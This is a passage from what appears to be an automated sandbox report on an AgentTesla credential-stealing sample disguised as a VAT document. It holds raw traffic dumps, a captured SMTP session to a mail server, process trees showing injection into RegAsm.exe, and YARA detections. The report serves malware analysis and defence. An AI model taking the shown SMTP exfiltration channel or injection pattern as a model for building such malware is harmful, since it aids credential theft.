                                      2021-09-27 11:24:29 UTC220INData Raw: 53 b3 6c 75 84 dc 26 48 c0 14 0b 2d c0 c7 74 97 e6 b8 17 bb 5a 3e e4 3a 16 53 60 81 06 04 99 45 d6 05 a6 35 eb c3 e3 8d df ad 13 0a 14 42 05 03 ae a8 af e7 0a 62 f7 d4 39 20 e1 1b 88 7c f5 13 90 ff ea 2f fc 99 e3 13 04 02 23 82 f8 47 c9 0e 82 aa 07 35 40 86 85 f9 01 f0 98 65 67 bd 2f 6a 66 c1 26 22 b3 2d 51 e7 7c ba c8 d3 c1 26 0e 4b 3f ea 87 3e 08 1b 02 bd 44 59 3e 09 58 a4 f8 fb 14 6a 0e ff 18 f5 42 56 93 24 3d 3a 75 80 05 58 5c ec 7d c5 bf 30 9c 4f fd 7f 56 79 51 c4 d2 7e e7 6e 83 0b c7 b2 46 25 06 1f 3c ae 32 84 16 09 f0 40 17 19 d7 28 c4 4a 68 e3 91 c5 25 46 2a fa 9a 65 99 a9 e9 37 be c4 8c f5 b3 32 0c 1f 2c c2 16 81 23 15 0b d4 47 23 cd 73 83 66 35 e1 51 d4 ea 9a 2a 4d 27 e2 16 bb 3d ea 45 13 9a 5d 77 62 54 92 41 14 f9 82 8e 14 d2 55 50 8e 52 07 00
                                      Data Ascii: Slu&H-tZ>:S`E5Bb9 |/#G5@eg/jf&"-Q|&K?>DY>XjBV$=:uX\}0OVyQ~nF%<2@(Jh%F*e72,#G#sf5Q*M'=E]wbTAUPR
                                      2021-09-27 11:24:29 UTC221INData Raw: 9d 39 f1 d2 43 43 92 41 06 77 85 90 cd 11 fc ae 4b 9e 2e 7e 89 e2 d9 ee df ac 5a 5a ba e0 09 64 c4 78 39 c6 d4 d4 85 fe 59 1e 81 30 8c ad e6 c6 3a 8c 01 22 c6 c1 d1 9b 25 2c 5c f0 cc ae cb 8b bf 94 a4 0c 22 b2 f4 bf 2a 9d 95 34 df 01 93 37 ac cd 09 d9 52 ec 30 17 91 f8 56 c1 74 ca 74 1e 0c 38 09 77 86 7b c9 42 c7 00 e1 f1 5b c1 39 94 cf 9f a0 96 f8 d8 81 62 33 26 a9 16 0d 70 fa d5 14 ef f4 3d a2 ad ee 1f ac 9e ed 7a 12 a5 54 b8 f8 c4 86 1e 41 62 b5 0b fd 2b 8f b8 88 3e 64 0b de d1 a6 a4 89 dc c9 49 67 65 cd c4 ad 94 bf e5 83 8e 47 68 55 47 fd 67 fd 53 64 f2 ea 6a 55 42 33 ad 39 be 7f b3 a8 7a 60 ce 5f 4b 46 b0 5a ab e8 2e ab 1d 31 0e 13 cb 3f 7f e3 c2 c1 9f bd 68 42 d8 ca 9a b3 80 4a 8d d3 3b 1c 72 93 47 18 bf 30 ea 46 ec 85 cd 59 4c e1 2d 19 78 19 44 1d
                                      Data Ascii: 9CCAwK.~ZZdx9Y0:"%,\"*47R0Vtt8w{B[9b3&p=zTAb+>dIgeGhUGgSdjUB39z`_KFZ.1?hBJ;rG0FYL-xD


                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Sep 27, 2021 13:26:05.891315937 CEST58749746109.169.39.245192.168.11.20220-s3.xperimenta.net ESMTP Exim 4.91 #1 Mon, 27 Sep 2021 13:26:05 +0200
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Sep 27, 2021 13:26:05.891838074 CEST49746587192.168.11.20109.169.39.245EHLO 899552
                                      Sep 27, 2021 13:26:05.911597967 CEST58749746109.169.39.245192.168.11.20250-s3.xperimenta.net Hello 899552 [84.17.52.54]
                                      250-SIZE 94371840
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Sep 27, 2021 13:26:05.911967993 CEST49746587192.168.11.20109.169.39.245STARTTLS
                                      Sep 27, 2021 13:26:05.935638905 CEST58749746109.169.39.245192.168.11.20220 TLS go ahead

                                      Code Manipulations

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:13:23:38
                                      Start date:27/09/2021
                                      Path:C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
                                      Imagebase:0x400000
                                      File size:90112 bytes
                                      MD5 hash:0A2F51E6D3650F115C1B5484AFBDF3A7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Visual Basic
                                      Reputation:low

                                      General

                                      Start time:13:24:02
                                      Start date:27/09/2021
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
                                      Imagebase:0x290000
                                      File size:65440 bytes
                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      General

                                      Start time:13:24:02
                                      Start date:27/09/2021
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
                                      Imagebase:0x5c0000
                                      File size:65440 bytes
                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:13:24:02
                                      Start date:27/09/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff673f70000
                                      File size:875008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Disassembly

                                      Code Analysis

                                      Reset < >